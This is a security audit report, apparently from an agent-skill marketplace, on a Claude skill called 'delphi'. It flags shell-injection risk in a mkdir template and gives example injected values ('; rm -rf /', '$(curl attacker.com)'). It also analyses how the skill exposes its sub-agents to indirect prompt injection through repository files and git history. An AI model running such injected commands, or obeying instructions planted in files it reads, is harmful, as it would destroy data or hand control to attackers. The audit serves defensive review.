Skills
skills/cygnusfear/claude-stuff/delphi/Gen Agent Trust Hub

delphi

Warn

Audited by Gen Agent Trust Hub on Feb 27, 2026

Risk Level: MEDIUMCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill provides a shell command template for directory creation: mkdir -p .oracle/${TIMESTAMP}-[topic]. This template incorporates a [topic] variable which is expected to be filled with user-provided content. If an agent executes this command literally without sanitizing the input, an attacker could provide a topic containing shell metacharacters (e.g., ; rm -rf / or $(curl attacker.com)) to perform unauthorized actions on the host system.
  • [PROMPT_INJECTION]: The skill is highly susceptible to indirect prompt injection due to its core design of reading from multiple potentially attacker-controlled data sources.
  • Ingestion points: The skill explicitly directs the agent and its sub-agents to read all files in the .oracle/, .plans/, and docs/ directories, as well as the full repository git history using git log -p.
  • Boundary markers: The prompt templates provided for the oracles do not use delimiters (like XML tags or triple quotes) to separate untrusted file content from instructions, nor do they include explicit warnings to ignore embedded instructions within those files.
  • Capability inventory: The sub-agents (oracles) have broad capabilities, including executing shell commands (Grep, Glob), performing web searches, and creating new tasks via the Task call. This allows instructions found in processed files to potentially trigger these capabilities.
  • Sanitization: There is no mechanism described to sanitize or filter the content of the files before they are read into the agent's context.
  • [PROMPT_INJECTION]: The 'Skepticism Protocol' included in the oracle prompt template contains instructions for the sub-agent to 'Do NOT accept the instructor's framing as truth' and warns that it 'may be receiving poisoned instructions'. While intended as a quality control measure to ensure independent investigation, instructions that explicitly tell an AI to distrust or ignore the context provided by its primary controller (the instructor) can be exploited to bypass constraints or safety guardrails established by the coordinator agent.
Audit Metadata
Risk Level
MEDIUM
Analyzed
Feb 27, 2026, 08:48 AM